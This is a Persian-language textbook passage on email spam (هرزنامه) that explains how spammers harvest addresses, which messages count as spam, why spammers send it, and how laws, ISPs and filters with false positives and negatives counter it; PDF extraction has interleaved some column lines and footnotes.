‫ﺁﺷﻨﺎﻳﻲ ﺑﻴﺸﺘﺮ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪ‬
‫•‬
‫ﻳﻚ ﻧﺎﻡ ﺩﺍﻣﻨﻪ‪ ٧٣‬ﺑﺮﺍﻱ ﺧﻮﺩ ﺛﺒﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻭ ﻳـﺎ‬
‫ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﮔﺮﻭﻩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻳﻚ ﭘﺎﻳﮕﺎﻩ‬
‫ﻭﺏ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫•‬
‫ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ﭘـﺴﺘﻲ ﻗﺎﺑـﻞ ﺣـﺪﺱ ﺯﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫•‬
‫ﻼ‬
‫ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻜﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻗﺒ ﹰ‬
‫ﺑﻪ ﺁﻧﻬﺎ ﻧﻔﻮﺫ ﺷﺪﻩ ﺍﺳﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﻫﺮﺯﻧﺎﻣـﻪ ﺩﺭ ﭘـﻲ ﺩﺍﺭﺩ ﺑﺎﻳـﺪ ﺳـﻪ‬
‫ﻧﻜﺘﻪ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ‪:‬‬
‫ﺍﻟﻒ( ﭼﮕﻮﻧﻪ ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﺏ( ﭼﻪ ﭼﻴﺰﻱ ﻫﺮﺯﻧﺎﻣﻪ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ )ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺩﻗﻴﻖ(‪.‬‬
‫ﺝ( ﭼﺮﺍ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﻟــﻒ( ﺍﮔــﺮ ﻳﻜــﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬــﺎﻱ ﺯﻳــﺮ ﺭﺍ ﺍﻧﺠــﺎﻡ ﺩﺍﺩﻩ ﺑﺎﺷــﻴﺪ‬
‫ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﻣﻮﻗﻌﻴﺖ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ ﺁﺩﺭﺱ ﺷـﻤﺎ ﺭﺍ‬
‫ﺩﺍﺭﻧﺪ‪:‬‬
‫•‬
‫ﻧﺎﻣﻪ ﻳﺎ ﺍﻣﻀﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﻳـﻚ ﻓﻬﺮﺳـﺖ ﺁﺩﺭﺱ‬
‫ﻋﻤﻮﻣﻲ‪ ٧٠‬ﺍﺭﺳﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫•‬
‫ﻼ ﺧﻮﺍﺳـﺘﻪ‬
‫ﺑﻪ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ؛ ﻣـﺜ ﹰ‬
‫ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﺯ ﻓﻬﺮﺳـﺖ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﮔﺎﻥ ﺣـﺬﻑ‬
‫ﺷﻮﻳﺪ‪.‬‬
‫•‬
‫ﺑﺮﺍﻱ ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ‪ ٧١‬ﻧﺎﻣﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫•‬
‫ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺩﺭ ﻳـﻚ ﻓـﺮﻡ ﻭﺏ ﺛﺒـﺖ ﻧـﺎﻡ ﻛـﺮﺩﻩ‬
‫ﺑﺎﺷﻴﺪ ﻭ ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻥ ﻭﺍﺭﺩ ﻧﻤـﻮﺩﻩ ﺑﺎﺷـﻴﺪ‬
‫ﻼ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻣﻌﺘﺒـﺮﻱ‬
‫)ﺣﺘﻲ ﺍﮔﺮ ﻛﺎﻣ ﹰ‬
‫ﻣﺮﺍﺟﻌﻪ ﻧﻤﻮﺩﻩﺍﻳﺪ(‪.‬‬
‫•‬
‫ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣـﻪ ﺷﻨﺎﺳـﺎﻳﻲ‪ ٧٢‬ﺭﻭﻱ ﺁﻥ‬
‫ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ )ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ‬
‫ﺍﮔﺮ ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺩﺭ ﻣـﻮﺭﺩ ﺷـﻤﺎ ﺻـﺪﻕ ﻛﻨـﺪ ﺍﺣﺘﻤـﺎﻝ‬
‫ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺁﺩﺭﺱ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ﻭ ﻳﺎ ﺣﺘﻲ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻓﺮﻭﺧﺘﻪ ﺷـﻮﺩ‪ .‬ﺑـﻪ‬
‫ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﮔﺮ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺍﻳـﻦ‬
‫ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ‬
‫ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﺏ( ﺑﺮﺧﻲ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺑﻪ ﺩﻟﻴﻞ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩ ﻭ ﻧﺎﻣﺮﺑﻮﻁ‬
‫ﻼ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﻪ ﻣﻲﺩﺍﻧﻨﺪ ﻛـﻪ‬
‫ﺑﻮﺩﻧﺸﺎﻥ ﻛﺎﻣ ﹰ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﺑﻌﻀﻲ ﻧﺎﻣﻪﻫﺎﻱ ﺩﻳﮕـﺮ ﺍﻳـﻦ‬
‫ﻣﺴﺌﻠﻪ ﻛﻤﺘﺮ ﺁﺷﻜﺎﺭ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ‬
‫ﺑﻪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳـﺎﻓﺘﻲ‬
‫ﺭﺍ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺪﺍﻧﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﻣﺜﺎﻟﻬﺎﻱ ﺯﻳﺮ ﺑـﻪ ﺭﻭﺷـﻦ ﺷـﺪﻥ‬
‫ﺑﻴﺸﺘﺮ ﻣﻮﺿﻮﻉ ﻛﻤﻚ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪:‬‬
‫•‬
‫ﺁﻳﺎ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﭼﮕﻮﻧﮕﻲ ﻣﺮﺍﻗﺒﺖ ﺍﺯ ﺍﺟـﺰﺍﻱ ﺻـﻮﺭﺕ ﺍﺳـﺖ‬
‫ﻳــﻚ ﻫﺮﺯﻧﺎﻣــﻪ ﺑــﻪ ﺷــﻤﺎﺭ ﻣــﻲﺭﻭﺩ؟ ﭘﺎﺳــﺦ‪ :‬ﺑﻠــﻪ‪،‬‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ؛ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺟـﺮﺍﺡ ﭘﻼﺳـﺘﻴﻚ‬
‫ﺑﺎﺷــﻴﺪ ﻭ ﺍﻳــﻦ ﻧﺎﻣــﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻳــﻚ ﻣﻘﺎﻟــﺔ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺎﺷﺪ ﻭ ﻧﻪ ﻳﻚ ﺁﮔﻬﻲ ﺗﺠﺎﺭﻱ‪.‬‬
‫•‬
‫ﺁﻳﺎ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻘﺎﻟﻪ ﺍﺯ ﺷﻤﺎ ﺑﺮﺍﻱ ﻳﻚ ﮔﺮﺩﻫﻤـﺎﻳﻲ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺎ ﻣﻮﺿـﻮﻋﻲ ﻣـﺒﻬﻢ ﻛـﻪ ﺑـﻪ ﭼﻨـﺪﻳﻦ‬
‫ﻓﻬﺮﺳﺖ ﺁﺩﺭﺱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺸﻤﺎﺭ‬
‫ﻣﻲﺭﻭﺩ؟ ﭘﺎﺳﺦ‪ :‬ﺷﺎﻳﺪ‪ .‬ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺑﻄـﻮﺭ ﺍﺗﻔـﺎﻗﻲ‬
‫ﻣﻮﺿﻮﻉ ﺁﻥ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﺷﻤﺎ ﺑﺎﺷﺪ ﻭ ﻣﺎﻳﻞ ﺑﺎﺷـﻴﺪ‬
‫ﺑﻪ ﺁﻥ ﭘﺎﺳﺦ ﺩﻫﻴﺪ‪.‬‬
‫•‬
‫ﺷــﺮﻛﺘﻲ ﻛــﻪ ﺑــﻪ ﺷــﻤﺎ ﻣﺤــﺼﻮﻟﻲ ﻓﺮﻭﺧﺘــﻪ ﻭ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺼﻮﻝ ﺑﻌﺪﻱ ﺧﻮﺩ ﺑـﺮﺍﻱ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ UNIX‬ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻫﺮ ﻛﺲ ﻛﻪ ﺁﻧﺮﺍ ﺳﺆﺍﻝ ﻛﻨﺪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ(‪.‬‬
‫•‬
‫ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ‬
‫ﻛﻨﺪ‪.‬‬
‫•‬
‫ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩ‬
‫ﺑﺎﺷﻴﺪ‪.‬‬
‫•‬
‫ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻳـﻚ ﺻـﻔﺤﺔ ﻭﺏ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ؛ ﻳﻌﻨـﻲ ﺍﺟـﺎﺯﻩ ﺩﺍﺩﻩ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﺩﺭﺱ‬
‫ﭘﺴﺘﻲ ﺷﻤﺎ ﺑﺮﺍﻱ ﻫﻤﻪ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫‪Public Mailing List‬‬
‫‪Newsgroup‬‬
‫‪Ident Daemon‬‬
‫‪70‬‬
‫‪71‬‬
‫‪72‬‬
‫‪Domain Name‬‬
‫‪73‬‬
‫‪٨٣‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺷــﻤﺎ ﻭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻣــﺸﺘﺮﻳﻬﺎﻱ ﺩﻳﮕــﺮ ﺍﺭﺳــﺎﻝ‬
‫ﻣﻲ ﻛﻨﺪ‪ ،‬ﺁﻳﺎ ﻫﺮﺯﻧﺎﻣﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺍﺳﺖ؟ ﭘﺎﺳـﺦ‪ :‬ﺧﻴـﺮ‪.‬‬
‫ﺍﻣــﺎ ﺑﺮﻧﺎﻣــﺔ ﻏﺮﺑــﺎﻝﺳــﺎﺯ ﻫﺮﺯﻧﺎﻣــﻪ ﺩﺭ ‪ ISP‬ﺷــﻤﺎ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺭﺍ ﺻﺮﻑ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ‬
‫ﻛﻨﺪ ﻛﻪ ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﭼﻨـﻴﻦ ﻧﺎﻣـﻪﺍﻱ ﻫﺮﺯﻧﺎﻣـﻪ‬
‫ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫•‬
‫ﺝ( ﭼــﺮﺍ ﻫﺮﺯﻧﺎﻣــﻪﻧــﻮﻳﺲﻫــﺎ ﺑــﺮﺍﻱ ﺍﻓــﺮﺍﺩ ﻫﺮﺯﻧﺎﻣــﻪ ﺍﺭﺳــﺎﻝ‬
‫ﻣﻲﻛﻨﻨﺪ؟ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺟﻮﺍﺏ‪ :‬ﭼﻮﻥ ﺍﻳﻨﻜﺎﺭ ﺟﻮﺍﺏ ﻣﻲﺩﻫـﺪ!‬
‫ﺍﮔﺮ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ ﺳـﺮﻳﻌﹰﺎ ﻣﺘﻮﺟـﻪ‬
‫ﻻ ﻫﺮﺯﻧﺎﻣﻪﻫـﺎ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻳﻚ ﺍﻟﮕﻮ ﺩﺭ ﺁﻥ ﻣﻲﺷﻮﻳﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺴﺎﺋﻠﻲ ﻫﺴﺘﻨﺪ ﭼﻮﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﭘﻮﻝ ﻳﺎ ﭘﺲﺍﻧﺪﺍﺯ ﺁﻥ‪،‬‬
‫ﺍﺭﺗﻘﺎﻱ ﺯﻧﺪﮔﻲ ﻋﺎﻃﻔﻲ ﻳﺎ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻼﻣﺘﻲ‪.‬‬
‫ﺍﻳﻦ ﻣﻮﺿﻮﻋﺎﺕ ﻳﻚ ﻧﻘﻄﺔ ﻣﺸﺘﺮﻙ ﻣﻬﻢ ﺩﺍﺭﻧﺪ‪ :‬ﺍﻏﻠﺐ ﻣـﺎ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺟﺪﻱ ﺩﺍﺭﻳﻢ ﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ‬
‫ﻣﺎ ﻧﻴﺰ ﺗﻮﺟﻪ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﻛﻨﻴﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ‬
‫ﺍﮔﺮ ﺩﺭﺻﺪ ﺑﺴﻴﺎﺭ ﺍﻧﺪﻛﻲ ﺍﺯ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ‪ ،‬ﺍﻳﻦ ﻧﺎﻣﻪﻫـﺎ‬
‫ﻼ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ ‪ ۱‬ﻧﺎﻣـﻪ ﺩﺭ ﻣﻴـﺎﻥ ﻫـﺮ‬
‫ﺭﺍ ﭘﻴﮕﻴﺮﻱ ﻛﻨﻨـﺪ )ﻣـﺜ ﹰ‬
‫‪ ۱۰۰،۰۰۰‬ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ( ﻫﺮﺯﻧﺎﻣﻪ ﻧﻮﻳﺲ ﻫـﺎﻳﻲ ﻛـﻪ ﭼﻨـﺪﻳﻦ‬
‫ﻣﻴﻠﻴﻮﻥ ﭘﻴﺎﻡ ﺩﺭ ﺭﻭﺯ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﻮﻝ ﺯﻳﺎﺩﻱ‬
‫ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ‪.‬‬
‫ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﭼﻪ ﺑﺎﻳﺪ ﻛﺮﺩ؟‬
‫ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻭ ﻛﻨﺘﺮﻝ ﻛـﺮﺩ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺩﻭﻟﺘﻬـﺎ ﺩﺭ ﺣـﻮﺯﺓ‬
‫ﻗﻀﺎﻳﻲ ﺧﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﮔـﺴﺘﺮﺵ ﻫﺮﺯﻧﺎﻣـﻪ‬
‫ﺗــﺼﻮﻳﺐ ﻛــﺮﺩﻩﺍﻧــﺪ‪ .‬ﺍﻛﺜــﺮ ‪ISP‬ﻫــﺎ ﻣﻌﺘﻘﺪﻧــﺪ ﻛــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺗﺴﻬﻴﻼﺕ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺮﺧﻼﻑ ﺗﻮﺍﻓﻘﻨﺎﻣﻪﻫـﺎﻱ‬
‫ﻛﺎﺭﻱ ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺗﺼﻮﻳﺐ ﭼﻨﻴﻦ ﻗﻮﺍﻧﻴﻨﻲ ﻣﻲ ﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ‪،‬‬
‫ﺍﻣﺎ ﺗﺎﻛﻨﻮﻥ ﺍﻋﻤﺎﻝ ﺍﻛﺜﺮ ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺑـﺴﻴﺎﺭ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻤـﺪﺓ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻣﺎﻧﻨـﺪ ﺷـﺮﻛﺘﻬﺎ( ﺍﺯ‬
‫ﭘﺬﻳﺮﻓﺘﻦ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺍﺯ ﺳﻮﻱ ‪ISP‬ﻫـﺎﻳﻲ ﻣﻨﺘـﺸﺮ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﺟﺎﺯﺓ ﻓﻌﺎﻟﻴﺖ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪﻧـﻮﻳﺲﻫـﺎ ﺭﺍ ﻣـﻲﺩﻫﻨـﺪ‬
‫ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺆﺛﺮ ﻭﺍﻗﻊ ﺷﻮﺩ‪ ،‬ﺯﻳﺮﺍ ‪ISP‬ﻫﺎ ﺭﺍ‬
‫ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ‪.‬‬
‫ﻻ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻲﮔﻨﺎﻫﻲ ﻛﻪ ﺗﻌﺪﺍﺩ‬
‫ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﻤﻲ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺻﺪ ﻣﺨﺘﻠﻒ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨـﺪ ﻫـﻢ‬
‫ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ‪ .‬ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺗﺸﺨﻴﺺ ﻫﺮﺯﻧﺎﻣﻪ‪ ،‬ﺣﺬﻑ ﺁﻥ ﻭ ﻳـﺎ ﻫـﺸﺪﺍﺭ ﺑـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ‬
‫ﻣﺒﻨﻲ ﺑﺮ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ .‬ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ ISP‬ﻳﺎ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﭘﺴﺘﻲ‪ ٧٤‬ﺑﻪ ﺍﺟﺮﺍ‬
‫ﺩﺭ ﺁﻭﺭﺩ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﺤﺘﻮﺍﻱ ﻧﺎﻣﻪ ﻭ ﻣﻨﺸﺎﺀ ﺍﺭﺳﺎﻝ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ‬
‫ﻣﻲﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﺑﻪ ﺳـﺨﺘﻲ ﻗﺎﺑـﻞ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﻫﺴﺘﻨﺪ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻧﻴـﺰ ﻣﻌﻤـﻮ ﹰﻻ ﺩﺍﺭﺍﻱ ﺗـﺸﺨﻴﺺ‬
‫ﻣﻨﻔﻲ ﻧﺎﺩﺭﺳﺖ )‪ (False Negative‬ﻭ ﺗﺸﺨﻴﺺ ﻣﺜﺒﺖ ﻧﺎﺩﺭﺳـﺖ‬
‫)‪ (False Positive‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪False Negative‬‬
‫‪Negative‬‬
‫‪ False‬ﺯﻣـﺎﻧﻲ ﺭﺥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺟﺴﺘﺠﻮﮔﺮ‪ ٧٥‬ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑـﺪﺍﻥ‬
‫ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﻫﺮﺯﻧﺎﻣـﻪ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﺯ‬
‫ﻏﺮﺑﺎﻝ ﻋﺒﻮﺭ ﻛﻨـﺪ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺍﺳـﺖ ﻛـﻪ ﮔﻔﺘـﻪ‬
‫ﻣﻲﺷﻮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ‪ %۱۰۰‬ﻣﺆﺛﺮ ﻧﺒﺎﺷﺪ‪.‬‬
‫‪False Positive‬‬
‫‪ False Positive‬ﺑـــﺪﻳﻦ ﻣﻌﻨﺎﺳـــﺖ ﻛـــﻪ ﺑﺮﻧﺎﻣـــﺔ‬
‫ﺟﺴﺘﺠﻮﮔﺮ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺑﻲﺿـﺮﺭ‬
